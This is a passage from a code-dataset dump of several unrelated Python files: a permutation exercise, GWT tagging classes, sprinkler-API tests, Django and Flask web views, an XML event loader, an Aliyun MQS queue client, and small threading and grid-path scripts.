Wong\n@since 2nd August 2014\n\nWeek 2 - Question 4\n\"Write a recursive program to print out all possible permutations of a given string\"\n'''\n\ndef permut(array):\n if len(array) == 1:\n return [array]\n result = []\n for permutation in permut(array[1:]):\n for i in range(len(array)):\n result.append(permutation[:i] + array[0:1] + permutation[i:])\n return result\n\nif __name__ == '__main__':\n\tprint(permut(\"abc\"))","sub_path":"week02/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"127008001","text":"# Tag classes\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# from Conversion.Tagging.NLP import NLP\nfrom Input.GWT import GWTObjects\n\n\nclass All_Tagged_GWTObject:\n def __init__(self, gwt: GWTObjects):\n # list, same as gwt.story\n self.story = gwt.story\n # list, same as gwt.scenario\n self.scenario = gwt.scenario\n # list of Pre objects, each holding a processed precondition and its Flag tag\n self.precondition = []\n # list, tag_of_action\n self.action = []\n # list, tag_of_postcondition\n self.postcondition = []\n\n # def add_type_into_action(self, gwt: GWTObjects):\n # nlp = NLP()\n # for action in gwt.when:\n # list1 = nlp.get_type_of_action(action)\n # self.action.extend(list1)\n #\n # def add_type_into_postcondition(self, gwt: GWTObjects):\n # nlp = NLP()\n # for postcon in gwt.then:\n # self.postcondition.extend(nlp.get_type_of_postcondition(postcon))\n #\n # def add_pre_into_precondition(self, gwt: GWTObjects):\n # '''\n # Convert every Given of the gwt object into a Tag and append it to the precondition list of the Tagged_gwt object\n # :param gwt: the input gwt object\n # '''\n # nlp = NLP()\n # for precond in gwt.given:\n # self.precondition.append(nlp.get_flag_of_precondition(precond))\n\n\n def print_allTaggedGWTObject(self):\n print(self.story)\n print(self.scenario)\n for pre in self.precondition:\n print(pre.content + '[' + str(pre.flag) + ']')\n for ac in self.action:\n print(ac.content + '[' + ac.type + ']')\n for post in self.postcondition:\n print(post.content + '[' + post.type + ']')\n\n\nclass Tagged_GWTObject:\n # def __init__(self, gwt: GWTObjects):\n # # list, same as gwt.story\n # self.story = gwt.story\n # # list, same as gwt.scenario\n # self.scenario = gwt.scenario\n # # list of Pre objects, each holding a processed precondition and its Flag tag\n # self.precondition = []\n # # list, same as gwt.when\n # self.action = gwt.when\n # # list, same as gwt.then\n # self.postcondition = gwt.then\n\n def __init__(self, all_tagged_gwt: All_Tagged_GWTObject):\n self.story = all_tagged_gwt.story\n self.scenario = all_tagged_gwt.scenario\n self.precondition = all_tagged_gwt.precondition\n self.action = []\n self.postcondition = []\n for ac in all_tagged_gwt.action:\n self.action.append(ac.content)\n for post in all_tagged_gwt.postcondition:\n self.postcondition.append(post.content)\n\n # def add_pre_into_precondition(self, gwt: GWTObjects):\n # '''\n # Convert every Given of the gwt object into a Pre and append it to the precondition list of the Tag object\n # :param gwt: the input gwt object\n # '''\n # nlp = NLP()\n # for precond in gwt.given:\n # self.precondition.append(nlp.get_flag_of_precondition(precond))\n\n def print_tag(self):\n print(self.story)\n print(self.scenario)\n for pre in self.precondition:\n print(pre.content)\n self.print_tag_switch(pre.flag)\n for action in self.action:\n print(action)\n for post in self.postcondition:\n print(post)\n\n def print_tag_switch(self, flag: int):\n '''\n switch/case over flag\n '''\n flags = {\n 0: \"negative\" + \" \" + str(flag),\n 1: \"positive\" + \" \" + str(flag),\n 2: \"not a branch condition\",\n 3: \"GLOBAL branch condition\"\n }\n 
print(flags.get(flag))\n","sub_path":"Conversion/Tagging/Tagged_GWTObject.py","file_name":"Tagged_GWTObject.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"614418341","text":"\"\"\"\nfile: test_programs.py\nAuthor: Aaron Bach\nEmail: bachya1208@gmail.com\nGithub: https://github.com/bachya/regenmaschine\n\"\"\"\n\n# -*- coding: utf-8 -*-\n# pylint: disable=no-self-use,too-few-public-methods,redefined-outer-name\n# pylint: disable=wildcard-import,unused-wildcard-import\n\nimport json\n\nimport requests_mock\n\nimport regenmaschine as rm\nfrom tests.fixtures.auth import *\nfrom tests.fixtures.misc import *\nfrom tests.fixtures.program import *\n\n\n# pylint: disable=too-many-arguments\ndef test_all_operations(client_general_response_200, local_cookies, local_url,\n local_auth_response_200, programs_all_response_200,\n programs_get_response_200,\n programs_nextrun_response_200,\n programs_running_response_200):\n \"\"\" Tests getting the program list \"\"\"\n with requests_mock.Mocker() as mock:\n mock.post(\n '{}/auth/login'.format(local_url),\n text=json.dumps(local_auth_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program'.format(local_url),\n text=json.dumps(programs_all_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program/nextrun'.format(local_url),\n text=json.dumps(programs_nextrun_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/program/1'.format(local_url),\n text=json.dumps(programs_get_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/program/1/start'.format(local_url),\n text=json.dumps(client_general_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/program/1/stop'.format(local_url),\n text=json.dumps(client_general_response_200),\n cookies=local_cookies)\n mock.get(\n '{}/watering/program'.format(local_url),\n text=json.dumps(programs_running_response_200),\n cookies=local_cookies)\n\n auth = rm.Authenticator.create_local('192.168.1.100', '12345')\n client = rm.Client(auth).programs\n assert client.all() == programs_all_response_200\n assert client.get(1) == programs_get_response_200\n assert client.next() == programs_nextrun_response_200\n assert client.running() == programs_running_response_200\n assert client.start(1) == client_general_response_200\n assert client.stop(1) == client_general_response_200\n\n\n# pylint: disable=protected-access\ndef test_remote_api_broken(local_auth_response_200, local_url,\n remote_auth_response_200, remote_url, sprinkler_id):\n \"\"\" Tests the broken_remote_api decorator \"\"\"\n with requests_mock.Mocker() as mock:\n mock.post(\n '{}/login/auth'.format(remote_url),\n text=json.dumps(remote_auth_response_200),\n cookies=remote_cookies)\n mock.post(\n '{}/auth/login'.format(local_url),\n text=json.dumps(local_auth_response_200),\n cookies=local_cookies)\n mock.post(\n '{}/s/{}/api/4/program/1/start'.format(remote_url, sprinkler_id),\n exc=rm.exceptions.BrokenAPICall(\n 'start() currently broken in remote API'))\n\n auth_local = rm.Authenticator.create_local('192.168.1.100', '12345')\n auth_remote = rm.Authenticator.create_remote('user@host.com', '12345')\n\n with pytest.raises(rm.exceptions.BrokenAPICall) as exc_info:\n client = rm.Client(auth_remote)\n client.programs._broken_remote_api_test()\n assert 'currently broken in remote API' in str(exc_info)\n\n client = rm.Client(auth_local)\n assert client.programs._broken_remote_api_test() == {'status': 
'ok'}\n","sub_path":"tests/test_programs.py","file_name":"test_programs.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"456184341","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom rest_framework.parsers import JSONParser\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom valuate.serializers import UserInputSerializer\nfrom valuate.models import UserValuationDetails\nimport json\nimport csv\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\ninput_data = []\n\ndef index(response):\n return HttpResponse(\"Connected\")\n\ndef getCity(response, city):\n return HttpResponse(\"City is {}\".format(city))\n\n@csrf_exempt\ndef export_csv(request):\n user_data=JSONParser().parse(request)\n data = user_data\n \n with open('writeData.csv', mode='w') as file:\n writer = csv.writer(file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n #way to write to csv file\n writer.writerow([\"Distance_Nearest_Town\",\"Perch\",\"Year\"])\n writer.writerow(data)\n print(data)\n return JsonResponse(data, safe= False)\n\ndef give_predictions(response):\n lr=LinearRegression()\n\n df=pd.read_csv(\"Galle_train_data.csv\")\n df.head()\n\n z=df[['Distance_Nearest_Town','Perch','Year']]\n lr.fit(z,df['Value_of_one_perch'])\n\n lr.intercept_\n lr.coef_[1]\n\n dfin=pd.read_csv(\"writeData.csv\")\n\n dfin.head()\n\n output=lr.intercept_+lr.coef_[0]*dfin.at[0,'Distance_Nearest_Town']+lr.coef_[1]*dfin.at[0,'Perch']+lr.coef_[2]*dfin.at[0,'Year']\n num = round(output, 2)\n return HttpResponse(num)\n\n@csrf_exempt\ndef get_valuate_inputs(request):\n user_inputs = JSONParser().parse(request)\n user_input_serializer = UserInputSerializer(data=user_inputs)\n if user_input_serializer.is_valid():\n user_input_serializer.save()\n return JsonResponse(\"Input Saved successfully..!\" , safe=False)\n return JsonResponse(\"Failed to Add.\",safe=False)\n\n@csrf_exempt\ndef get_saved_inputs(request):\n data = UserValuationDetails.objects.all()\n user_serializer = UserInputSerializer(data, many=True)\n return JsonResponse(user_serializer.data, safe=False)\n\n","sub_path":"Django/apiPy/valuate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233127773","text":"#!/usr/bin/env python\nfrom django.db.models import signals\nfrom django.utils.functional import curry\n\n\nclass CreatedByMiddleware(object):\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n response = self.process_request(request)\n if response is None:\n response = self.get_response(request)\n response = self.process_response(request, response)\n return response\n\n def process_request(self, request):\n if request.method in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):\n user = None\n if hasattr(request, 'user') and request.user.is_authenticated:\n user = request.user\n\n mark_created_by = curry(self.mark_created_by, user)\n signals.pre_save.connect(mark_created_by, dispatch_uid=(self.__class__, request,), weak=False)\n\n def process_response(self, request, response):\n return response\n\n def mark_created_by(self, user, sender, instance, **kwargs):\n for field in instance._meta.fields:\n \"\"\"hasattr(instance, 'created_by') to 
avoid RelatedObjectDoesNotExist\"\"\"\n if 'created_by' == field.name:\n if not hasattr(instance, 'created_by'):\n instance.created_by = user\n","sub_path":"venv/Lib/site-packages/created_by/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"435687568","text":"'''\n This module provides a comb sort algorithm implementation\n'''\n\ndef comb_sort(values):\n '''\n Sort values using the comb sort algorithm\n \n The comb sort algorithm is a bubble sort variant where the comparison is not\n done between 2 adjascent element but using a gap which is then decreased until\n it reaches the value of 1 in which case, we continue with the classical bubble sort\n '''\n did_swap = True\n gap = len(values)\n factor = 1.3\n \n while gap > 1 or did_swap:\n # reduce the gap\n gap = int(max(1, gap // factor))\n did_swap = False\n # Check for unordred bubbles\n for index in xrange(0, len(values)-gap, gap):\n if values[index] > values[index + gap]:\n # Swap values and set did_swap to true\n values[index], values[index + gap] = values[index + gap], values[index]\n did_swap = True\n \nif __name__ == \"__main__\":\n values = range(10)\n values.reverse()\n print (\"Before: {}\".format(values))\n comb_sort(values)\n print (\"After: {}\".format(values))","sub_path":"sort_tutorial/comb_sort.py","file_name":"comb_sort.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"641171084","text":"# bookhandler.py\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n \nimport xml.sax.handler\n\nimport configparser\nsettings = configparser.ConfigParser()\nsettings.read('config')\nuser = settings.get('database', 'user')\nurl = settings.get('database', 'url')\nevents_table = settings.get('database', 'events_table')\n\npg_db = create_engine('mysql://' + user + '@' + url)\n \nmetadata = MetaData(pg_db)\n \nevents_table = Table('events_first_try', metadata, autoload=True)\n\ni = 0\ndef mydefault():\n global i\n i += 1\n return i\n\n\nclass Events(object):\n Column('id', Integer, primary_key=True, default=mydefault)\n pass\n \nmapper(Events, events_table)\n \nclass EventsHandler(xml.sax.handler.ContentHandler):\n def __init__(self):\n self.buffer = \"\"\n self.inField = 0\n self.session = create_session(bind=pg_db)\n \n def startElement(self, name, attributes):\n if name == \"event\":\n self.event_id = attributes[\"id\"]\n elif name == \"title\":\n self.inField = 1\n elif name == \"url\":\n self.inField = 1\n elif name == \"description\":\n self.inField = 1\n elif name == \"start_time\":\n self.inField = 1\n elif name == \"end_time\":\n self.inField = 1\n elif name == \"venue_url\":\n self.inField = 1\n elif name == \"venue_address\":\n self.inField = 1\n elif name == \"city_name\":\n self.inField = 1\n elif name == \"latitude\":\n self.inField = 1\n elif name == \"longitude\":\n self.inField = 1\n elif name == \"postal_code\":\n self.inField = 1\n elif name == \"category\":\n self.inField = 1\n\n \n def characters(self, data):\n if self.inField:\n self.buffer += data\n \n def endElement(self, name):\n if name == \"event\":\n self.session.begin()\n self.newevent = Events()\n self.newevent.id = self.event_id\n self.newevent.title = self.title\n self.newevent.url = self.url\n self.newevent.description = self.description\n self.newevent.start_time = self.start_time\n self.newevent.end_time = 
self.end_time\n self.newevent.venue_url = self.venue_url\n self.newevent.venue_address = self.venue_address\n self.newevent.city_name = self.city_name\n self.newevent.latitude = self.latitude\n self.newevent.longitude = self.longitude\n self.newevent.postal_code = self.postal_code\n self.newevent.category = self.category\n self.session.add(self.newevent)\n self.session.commit()\n elif name == \"title\":\n self.inField = 0\n self.title = self.buffer\n elif name == \"url\":\n self.inField = 0\n self.url = self.buffer\n elif name == \"description\":\n self.inField = 0\n self.description = self.buffer\n elif name == \"start_time\":\n self.inField = 0\n self.start_time = self.buffer\n elif name == \"stop_time\":\n self.inField = 0\n self.end_time = self.buffer\n elif name == \"venue_url\":\n self.inField = 0\n self.venue_url = self.buffer\n elif name == \"venue_address\":\n self.inField = 0\n self.venue_address = self.buffer\n elif name == \"city_name\":\n self.inField = 0\n self.city_name = self.buffer\n elif name == \"latitude\":\n self.inField = 0\n self.latitude = self.buffer\n elif name == \"longitude\":\n self.inField = 0\n self.longitude = self.buffer\n elif name == \"postal_code\":\n self.inField = 0\n self.postal_code = self.buffer\n elif name == \"category\":\n self.inField = 0\n self.category = self.buffer\n self.buffer = \"\"","sub_path":"data-collection/xml_db_model.py","file_name":"xml_db_model.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"406705836","text":"import math\nimport random\nimport json\n\n\nclass Node:\n def __init__(self, lb, tb):\n self.val = None\n self.mb = None\n self.lb = lb # prev left branch\n self.tb = tb # prev top branch\n self.opt = None\n\n def calculate_mb(self):\n self.mb = math.sqrt(self.tb[0] ** 2 + self.lb[0] ** 2)\n\n\ndef algorithm(cur_node, v, prev_node):\n if cur_node.val == None or cur_node.val>v:\n cur_node.val=v\n cur_node.opt=prev_node\n elif cur_node.val<v:\n return\n\n if cur_node.lb != None:\n algorithm(cur_node.lb[0], cur_node.lb[1]+v, cur_node)\n if cur_node.tb != None:\n algorithm(cur_node.tb[0], cur_node.tb[1]+v, cur_node)\n \n\n\ndef gen_rawdata(y, x):\n rawdata = []\n for row in range(y):\n cur_row = []\n for col in range(x):\n cur_row.append([random.randint(1, 10), random.randint(1, 10)])\n rawdata.append(cur_row)\n return rawdata\n\n\ndef gen_nodes(rawdata):\n nodes = []\n for y, row in enumerate(rawdata):\n cur_row = []\n for x, col in enumerate(row):\n if x == 0:\n lb = None\n else:\n lb = [cur_row[x - 1], col[0]]\n if y == 0:\n tb = None\n else:\n tb = [nodes[y - 1][x], col[1]]\n cur_row.append(Node(lb, tb))\n nodes.append(cur_row)\n return nodes\n\ndef print_nodes(nodes):\n for row in nodes:\n for col in row:\n print(f\"[{col.val}]\", end=\"\")\n print(\"\")\n print(\"\\n\")\n\ndef optimal_path(cur_node):\n if cur_node.opt == None:\n return\n print(cur_node.val)\n optimal_path(cur_node.opt)\n\ndef main():\n x,y=7,6;\n\n rawdata=gen_rawdata(y,x)\n\n with open('example_data.json', 'r') as file:\n rawdata=json.load(file)\n\n nodes = gen_nodes(rawdata)\n nodes[y-1][x-1].val=0\n\n print_nodes(nodes)\n\n algorithm(nodes[y-1][x-1],0, None)\n\n print_nodes(nodes)\n\n optimal_path(nodes[0][0])\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 
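+{"seq_id":"000000000","text":"# Editor-added sketch (not part of the original dataset; placeholder seq_id and\n# metadata, dataset tagged 'editor-example'). A Python 3 rendering of the\n# comb_sort record earlier in this file: that record targets Python 2 (xrange,\n# a list-returning range), so this sketch shows the same shrinking-gap idea in\n# idiomatic Python 3. Names and the 1.3 shrink factor follow the original.\n\ndef comb_sort(values):\n    '''Sort values in place with comb sort: a bubble sort variant whose\n    comparison gap shrinks by a fixed factor until it reaches 1.'''\n    gap = len(values)\n    factor = 1.3\n    did_swap = True\n    while gap > 1 or did_swap:\n        gap = max(1, int(gap / factor))  # shrink the comparison gap, floor at 1\n        did_swap = False\n        for index in range(len(values) - gap):\n            if values[index] > values[index + gap]:\n                # swap the out-of-order pair separated by the current gap\n                values[index], values[index + gap] = values[index + gap], values[index]\n                did_swap = True\n\nif __name__ == '__main__':\n    values = list(range(10))\n    values.reverse()\n    print('Before: {}'.format(values))\n    comb_sort(values)\n    print('After: {}'.format(values))\n","sub_path":"examples/comb_sort_py3_sketch.py","file_name":"comb_sort_py3_sketch.py","file_ext":"py","program_lang":"python","lang":"en","doc_type":"code","dataset":"editor-example","pt":"83"}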
+{"seq_id":"531113780","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport hashlib\nimport hmac\nimport string\n\nfrom mqs_xml_handler import *\nfrom mqs_tool import *\nfrom mqs_http import *\n\n\nGET_ACCOUNT_STATUS = 200\nCREATE_QUEUE_STATUS = 201\nDELETE_QUEUE_STATUS = 204\nLIST_QUEUE_STATUS = 200\nSET_QUEUE_ATTRIBUTES_STATUS = 200\nSEND_MESSAGE_STATUS = 201\nRECEIVE_MESSAGE_STATUS = 200\nDELETE_MESSAGE_STATUS = 204\nPEEK_MESSAGE_STATUS = 200\nCHANGE_MESSAGE_VISIBILITY_STATUS = 200\nSET_POLICY_STATUS = 204\nDELETE_POLICY_STATUS = 204\nGET_POLICY_STATUS = 200\n\nclass MQSClient:\n __max_listener_number = 50\n def __init__(self, host, accessId, accessKey, version = \"2014-07-08\"):\n self.mHost = host\n self.mAccessId = accessId\n self.mAccessKey = accessKey\n self.mHttp = MQSHttp()\n self.mVersion = version\n\n def set_connection_timeout(self, connTimeout):\n self.mHttp.set_connection_timeout(connTimeout)\n\n#===============================================sdk===============================================#\n \n def create_queue(self, req, resp):\n #check parameter\n CreateQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n req_inter.data = QueueEncoder.encode(req)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(CREATE_QUEUE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.queue_url = resp.header[\"location\"]\n\n def delete_queue(self, req, resp):\n #check parameter\n DeleteQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(DELETE_QUEUE_STATUS, resp_inter, resp)\n\n def list_queue(self, req, resp):\n #check parameter\n ListQueueValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/\")\n if req.prefix != \"\":\n req_inter.header[\"x-mqs-prefix\"] = req.prefix\n if req.ret_number != -1:\n req_inter.header[\"x-mqs-ret-number\"] = str(req.ret_number)\n if req.marker != \"\":\n req_inter.header[\"x-mqs-marker\"] = str(req.marker)\n if req.with_meta:\n req_inter.header[\"x-mqs-with-meta\"] = \"true\"\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(LIST_QUEUE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.queueurl_list, resp.next_marker, resp.queuemeta_list = ListQueueDecoder.decode(resp_inter.data, req)\n\n def set_queue_attributes(self, req, resp):\n #check parameter\n SetQueueAttrValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s?metaoverride=true\" % (req.queue_name))\n req_inter.data = QueueEncoder.encode(req, False)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response \n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SET_QUEUE_ATTRIBUTES_STATUS, resp_inter, resp)\n\n def get_queue_attributes(self, req, resp):\n #check parameter\n 
GetQueueAttrValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SET_QUEUE_ATTRIBUTES_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n queue_attr = GetQueueAttrDecoder.decode(resp_inter.data)\n resp.active_messages = string.atol(queue_attr[\"ActiveMessages\"])\n resp.create_time = string.atol(queue_attr[\"CreateTime\"])\n resp.delay_messages = string.atol(queue_attr[\"DelayMessages\"])\n resp.delay_seconds = string.atol(queue_attr[\"DelaySeconds\"])\n resp.inactive_messages = string.atol(queue_attr[\"InactiveMessages\"])\n resp.last_modify_time = string.atol(queue_attr[\"LastModifyTime\"])\n resp.maximum_message_size = string.atol(queue_attr[\"MaximumMessageSize\"])\n resp.message_retention_period = string.atol(queue_attr[\"MessageRetentionPeriod\"])\n resp.queue_name = queue_attr[\"QueueName\"]\n resp.visibility_timeout = string.atol(queue_attr[\"VisibilityTimeout\"])\n resp.polling_wait_seconds = string.atol(queue_attr[\"PollingWaitSeconds\"])\n\n def send_message(self, req, resp):\n #check parameter\n SendMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, uri = \"/%s/messages\" % req.queue_name)\n req_inter.data = MessageEncoder.encode(req)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(SEND_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.message_id, resp.message_body_md5 = SendMessageDecoder.decode(resp_inter.data)\n\n def receive_message(self, req, resp):\n #check parameter\n ReceiveMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(RECEIVE_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n data = RecvMessageDecoder.decode(resp_inter.data, req)\n self.make_recvresp(data, resp)\n\n def delete_message(self, req, resp):\n #check parameter\n DeleteMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?ReceiptHandle=%s\" % (req.queue_name, req.receipt_handle))\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(DELETE_MESSAGE_STATUS, resp_inter, resp)\n\n def peek_message(self, req, resp):\n #check parameter\n PeekMessageValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?peekonly=true\" % req.queue_name)\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(PEEK_MESSAGE_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n data = PeekMessageDecoder.decode(resp_inter.data, 
req)\n self.make_peekresp(data, resp)\n\n def change_message_visibility(self, req, resp):\n #check parameter\n ChangeMsgVisValidator.validate(req)\n\n #make request internal\n req_inter = RequestInternal(req.method, \"/%s/messages?ReceiptHandle=%s&VisibilityTimeout=%d\" % (req.queue_name, req.receipt_handle, req.visibility_timeout))\n self.build_header(req, req_inter)\n\n #send request\n resp_inter = self.mHttp.send_request(req_inter)\n\n #handle result, make response\n resp.status = resp_inter.status\n resp.header = resp_inter.header\n self.check_status(CHANGE_MESSAGE_VISIBILITY_STATUS, resp_inter, resp)\n if resp.error_data == \"\":\n resp.receipt_handle, resp.next_visible_time = ChangeMsgVisDecoder.decode(resp_inter.data)\n\n \n################################################################################################### \n#----------------------internal-------------------------------------------------------------------#\n def build_header(self, req, req_inter):\n if req_inter.data != \"\":\n req_inter.header[\"content-md5\"] = base64.b64encode(hashlib.md5(req_inter.data).hexdigest())\n req_inter.header[\"content-type\"] = \"text/xml;charset=UTF-8\"\n req_inter.header[\"x-mqs-version\"] = self.mVersion\n req_inter.header[\"host\"] = self.mHost\n req_inter.header[\"date\"] = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n req_inter.header[\"Authorization\"] = self.get_signature(req_inter.method, req_inter.header, req_inter.uri)\n\n def get_signature(self,method,headers,resource):\n content_md5 = self.get_element('content-md5', headers)\n content_type = self.get_element('content-type', headers)\n date = self.get_element('date', headers)\n canonicalized_resource = resource\n canonicalized_mqs_headers = \"\"\n if len(headers) > 0:\n x_header_list = headers.keys()\n x_header_list.sort()\n for k in x_header_list:\n if k.startswith('x-mqs-'):\n canonicalized_mqs_headers += k + \":\" + headers[k] + \"\\n\"\n string_to_sign = \"%s\\n%s\\n%s\\n%s\\n%s%s\" % (method, content_md5, content_type, date, canonicalized_mqs_headers, canonicalized_resource)\n h = hmac.new(self.mAccessKey, string_to_sign, hashlib.sha1)\n signature = base64.b64encode(h.digest())\n signature = \"MQS \" + self.mAccessId + \":\" + signature\n return signature\n\n def get_element(self, name, container):\n if name in container:\n return container[name]\n else:\n return \"\"\n\n def check_status(self, expect_status, resp_inter, resp):\n if resp_inter.status == expect_status or (resp_inter.status >= 300 and resp_inter.status < 400):\n resp.error_data = \"\"\n else:\n resp.error_data = resp_inter.data\n if resp_inter.status >= 400 and resp_inter.status <= 600:\n error = ErrorDecoder.decode(resp.error_data)\n raise MQSServerException(error[\"Code\"], error[\"Message\"], error[\"RequestId\"], error[\"HostId\"])\n else:\n raise MQSClientNetworkException(\"UnkownError\", resp_inter.data)\n\n def make_recvresp(self, data, resp):\n resp.dequeue_count = string.atol(data[\"DequeueCount\"])\n resp.enqueue_time = string.atol(data[\"EnqueueTime\"])\n resp.first_dequeue_time = string.atol(data[\"FirstDequeueTime\"])\n resp.message_body = data[\"MessageBody\"]\n resp.message_id = data[\"MessageId\"]\n resp.message_body_md5 = data[\"MessageBodyMD5\"]\n resp.next_visible_time = string.atol(data[\"NextVisibleTime\"])\n resp.receipt_handle = data[\"ReceiptHandle\"]\n resp.priority = string.atol(data[\"Priority\"])\n\n def make_peekresp(self, data, resp):\n resp.dequeue_count = string.atol(data[\"DequeueCount\"])\n 
resp.enqueue_time = string.atol(data[\"EnqueueTime\"])\n resp.first_dequeue_time = string.atol(data[\"FirstDequeueTime\"])\n resp.message_body = data[\"MessageBody\"]\n resp.message_id = data[\"MessageId\"]\n resp.message_body_md5 = data[\"MessageBodyMD5\"]\n resp.priority = string.atol(data[\"Priority\"])\n","sub_path":"kombu_aliyun_mqs/aliyun_mqs/mqs_client.py","file_name":"mqs_client.py","file_ext":"py","file_size_in_byte":12164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36096024","text":"\"\"\"\n\nhttps://www.youtube.com/watch?v=6eqC1WTlIqc&list=PL1A2CSdiySGIPxpSlgzsZiWDavYTAx61d&index=5\n\na basic timer program\neach timer thread will output the current time\nname - a name of a thread\n\n\"\"\"\n\nfrom threading import Thread\nimport time\n\ndef timer(name, delay, repeat):\n print(name, \" Started\")\n while repeat > 0:\n time.sleep(delay) # wait for certain amount of time\n print(name, \": \", str(time.ctime(time.time())), \"\\n\")\n repeat -= 1\n print(\"Timer: \" + name + \" Completed\")\n\ndef Main():\n # 1 is a delay, 5 times repeat\n t1 = Thread(target=timer, args=(\"Timer1\", 1, 5))\n t2 = Thread(target=timer, args=(\"Timer2\", 2, 5))\n t1.start()\n t2.start()\n\n print(\"Main completed\")\n\nif __name__ == \"__main__\":\n Main()\n","sub_path":"03_Adv_05_Multi_Threading_01.py","file_name":"03_Adv_05_Multi_Threading_01.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"5237042","text":"from flask import Flask, request, Response\nimport json \n\nfrom db_connection import get_students, add_student, delete_student, update_student\nfrom validation import validate\n\n\napp = Flask(__name__)\n\n@app.route('/students', methods = ['GET'])\ndef students():\n data = get_students()\n response = app.response_class(\n response=json.dumps(data),\n status=200,\n mimetype='application/json'\n )\n return response\n\n@app.route('/students/add', methods = ['POST'])\ndef add():\n args = request.get_json()\n\n check = validate(args['name'],args['mark'])\n if check['isValid']:\n result = add_student(args['name'],args['mark'])\n else:\n result = check\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return response\n\n@app.route('/students/delete', methods = ['POST'])\ndef delete():\n args = request.get_json()\n result = delete_student(args['id'])\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return 